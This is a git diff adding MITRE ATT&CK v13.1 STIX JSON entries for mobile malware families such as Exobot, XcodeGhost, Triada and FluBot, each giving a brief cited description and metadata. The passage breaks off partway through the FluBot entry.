a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c91cec55-634c-4670-ba10-2dc7ceb28e98.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c91cec55-634c-4670-ba10-2dc7ceb28e98.json new file mode 100644 index 0000000000000000000000000000000000000000..90dd5dba8a2d536ab7f60ef4890f7daf4e10480e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--c91cec55-634c-4670-ba10-2dc7ceb28e98.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--50d98910-a2ca-4905-b12a-dc19838f39fb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Exobot", + "Marcher" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "type": "malware", + "created": "2020-10-29T13:32:20.972Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0522", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0522" + }, + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + }, + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-07T14:28:31.876Z", + "name": "Exobot", + "description": "[Exobot](https://attack.mitre.org/software/S0522) is Android banking malware, primarily targeting financial institutions in Germany, Austria, and France.(Citation: Threat Fabric Exobot)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ca4f63b9-a358-4214-bb26-8c912318cfde.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ca4f63b9-a358-4214-bb26-8c912318cfde.json new file mode 100644 index 0000000000000000000000000000000000000000..fce22b1cea312ef5c2372c1d39e50fd4b17ca89b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ca4f63b9-a358-4214-bb26-8c912318cfde.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--a7defb13-9aec-42b0-bc62-24ee9bf251a7", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "OBAD", + "description": "OBAD is an Android malware family. (Citation: TrendMicro-Obad)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--ca4f63b9-a358-4214-bb26-8c912318cfde", + "created": "2017-10-25T14:48:44.540Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0286", + "external_id": "S0286" + }, + { + "source_name": "OBAD", + "description": "(Citation: TrendMicro-Obad)" + }, + { + "source_name": "TrendMicro-Obad", + "description": "Veo Zhang. (2013, June 13). Cybercriminals Improve Android Malware Stealth Routines with OBAD. Retrieved December 9, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d05f7357-4cbe-47ea-bf83-b8604226d533.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d05f7357-4cbe-47ea-bf83-b8604226d533.json new file mode 100644 index 0000000000000000000000000000000000000000..bc832a2e546bb8b639b7b19f9da472b4f4d608bb --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d05f7357-4cbe-47ea-bf83-b8604226d533.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--5f94a680-b843-471f-9c9c-a8d41e9a4245", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Android/Chuli.A", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Android/Chuli.A" + ], + "type": "malware", + "id": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "created": "2017-10-25T14:48:45.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0304", + "external_id": "S0304" + }, + { + "source_name": "Android/Chuli.A", + "description": "(Citation: Kaspersky-WUC)" + }, + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d1c600f8-0fb6-4367-921b-85b71947d950.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d1c600f8-0fb6-4367-921b-85b71947d950.json new file mode 100644 index 0000000000000000000000000000000000000000..2fdb7941a6b45de6581e2d64a491b0f8cdef152e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d1c600f8-0fb6-4367-921b-85b71947d950.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--8c094989-32f9-4ebe-bcde-f2db23e919ff", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Charger", + "description": "[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals steals contacts and SMS messages from the user's device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Charger" + ], + "type": "malware", + "id": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "created": "2017-10-25T14:48:39.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0323", + "external_id": "S0323" + }, + { + "source_name": "Charger", + "description": "(Citation: CheckPoint-Charger)" + }, + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe.json new file mode 100644 index 0000000000000000000000000000000000000000..19f37ccf31eccf9d247c59d93b454e11404d7ba2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--b8248a25-a1fe-45d7-a32c-0b130c873e58", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T22:33:34.237Z", + "name": "Drinik", + "description": "[Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Drinik" + ], + "type": "malware", + "id": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "created": "2023-01-18T19:05:43.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1054", + "external_id": "S1054" + }, + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d89c132d-7752-4c7f-9372-954a71522985.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d89c132d-7752-4c7f-9372-954a71522985.json new file mode 100644 index 0000000000000000000000000000000000000000..6313c0999bd3da3ce43c6788b1ab3e5551a827f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d89c132d-7752-4c7f-9372-954a71522985.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--c5127a3a-708d-467f-9759-2a60ec9bc2dd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "[Trojan-SMS.AndroidOS.OpFake.a](https://attack.mitre.org/software/S0308) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--d89c132d-7752-4c7f-9372-954a71522985", + "created": "2017-10-25T14:48:46.734Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0308", + "external_id": "S0308" + }, + { + "source_name": "Trojan-SMS.AndroidOS.OpFake.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d9e07aea-baad-4b68-bdca-90c77647d7f9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d9e07aea-baad-4b68-bdca-90c77647d7f9.json new file mode 100644 index 0000000000000000000000000000000000000000..f6c3e6f08d71923e1dccbd1fc2ea75a351f1fb36 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--d9e07aea-baad-4b68-bdca-90c77647d7f9.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--36b2624e-e050-438d-bc53-e3909dd8c1b2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "XcodeGhost", + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "created": "2017-10-25T14:48:42.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0297", + "external_id": "S0297" + }, + { + "source_name": "XcodeGhost", + "description": "(Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)" + }, + { + "source_name": "PaloAlto-XcodeGhost1", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/" + }, + { + "source_name": "PaloAlto-XcodeGhost", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ddbe5657-e21e-4a89-8221-2f1362d397ec.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ddbe5657-e21e-4a89-8221-2f1362d397ec.json new file mode 100644 index 0000000000000000000000000000000000000000..89dc5d594e8826b75fc3c0584be8085c98f3e73f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ddbe5657-e21e-4a89-8221-2f1362d397ec.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--3cf2da12-04c0-44cc-877c-e1ee509631c6", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "SilkBean" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "type": "malware", + "created": "2020-12-24T21:41:36.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0549", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0549" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-04-19T14:29:45.809Z", + "name": "SilkBean", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--dfdac962-9461-47f0-a212-36dfce2a97e6.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--dfdac962-9461-47f0-a212-36dfce2a97e6.json new file mode 100644 index 0000000000000000000000000000000000000000..d7c985cd81b924599cf0b7d3903e7ec5e6fd1f70 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--dfdac962-9461-47f0-a212-36dfce2a97e6.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--e4f81d96-b564-4651-a405-e3d881295b08", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "WolfRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "type": "malware", + "created": "2020-07-20T13:27:33.113Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0489", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0489" + }, + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-09-11T15:58:40.564Z", + "name": "WolfRAT", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) is malware based on a leaked version of [Dendroid](https://attack.mitre.org/software/S0301) that has primarily targeted Thai users. [WolfRAT](https://attack.mitre.org/software/S0489) has most likely been operated by the now defunct organization Wolf Research.(Citation: Talos-WolfRAT) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4.json new file mode 100644 index 0000000000000000000000000000000000000000..863940ea54b2549b1274e1e4c148abc4a39f0ad4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--891abd3a-ef78-425c-afa8-467e169c6334", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-28T17:20:20.194Z", + "name": "BusyGasper", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) is Android spyware that has been in use since May 2016. There have been less than 10 victims, all who appear to be located in Russia, that were all infected via physical access to the device.(Citation: SecureList BusyGasper)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "BusyGasper" + ], + "type": "malware", + "id": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "created": "2021-10-01T14:42:48.234Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0655", + "external_id": "S0655" + }, + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper \u2013 the unfriendly spy. Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e13d084c-382f-40fd-aa9a-98d69e20301e.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e13d084c-382f-40fd-aa9a-98d69e20301e.json new file mode 100644 index 0000000000000000000000000000000000000000..530aaf65f6c8ba001bc34b0809f75f3a7ffb8ef7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e13d084c-382f-40fd-aa9a-98d69e20301e.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--96119e33-cae1-49ae-9909-8352cafa11cf", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "created": "2017-10-25T14:48:47.674Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0293", + "url": "https://attack.mitre.org/software/S0293" + }, + { + "source_name": "CheckPoint-BrainTest", + "url": "http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/", + "description": "Andrey Polkovnichenko and Alon Boxiner. (2015, September 21). BrainTest \u2013 A New Level of Sophistication in Mobile Malware. Retrieved December 21, 2016." + }, + { + "source_name": "Lookout-BrainTest", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BrainTest](https://attack.mitre.org/software/S0293) is a family of Android malware. (Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)", + "modified": "2022-04-15T15:36:43.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "BrainTest", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e296b110-46d3-4f7a-894c-cc71ea50168c.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e296b110-46d3-4f7a-894c-cc71ea50168c.json new file mode 100644 index 0000000000000000000000000000000000000000..04b74f68d0ba20fb54983226aaef0cfa47bb358c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--e296b110-46d3-4f7a-894c-cc71ea50168c.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--ef95d125-49e0-497a-8da3-4fb05fd50782", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "TERRACOTTA" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "type": "malware", + "created": "2020-12-18T20:14:46.858Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0545", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0545" + }, + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-28T18:59:32.817Z", + "name": "TERRACOTTA", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f082fc59-0317-49cf-971f-a1b6296ebb52.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f082fc59-0317-49cf-971f-a1b6296ebb52.json new file mode 100644 index 0000000000000000000000000000000000000000..5dbbf90752e64be6968e77dc5dc1532df262d5db --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f082fc59-0317-49cf-971f-a1b6296ebb52.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a831de87-12ec-420b-afbe-34ed0f3b271c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Triada" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "type": "malware", + "created": "2019-07-16T14:33:12.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0424", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0424" + }, + { + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/", + "source_name": "Kaspersky Triada March 2016" + } + ], + "modified": "2020-05-28T16:52:37.979Z", + "name": "Triada", + "description": "[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f3975cc0-72bc-4308-836e-ac701b83860e.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f3975cc0-72bc-4308-836e-ac701b83860e.json new file mode 100644 index 0000000000000000000000000000000000000000..897e46bd73d945cf54d4b1dd4190abf92c20d2e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f3975cc0-72bc-4308-836e-ac701b83860e.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--214da390-f24d-49cf-9fd9-cdbbb21ffb9a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Golden Cup" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "type": "malware", + "created": "2020-11-20T15:44:57.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0535", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0535" + }, + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-12-22T21:48:10.951Z", + "name": "Golden Cup", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) is Android spyware that has been used to target World Cup fans.(Citation: Symantec GoldenCup) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc.json new file mode 100644 index 0000000000000000000000000000000000000000..5af8cd710e9042814ab4b479f6226735b34a2d6d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--912a39c2-3745-4ee9-a785-48f50bc6f67a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-31T23:02:48.577Z", + "name": "FluBot", + "description": "[FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain 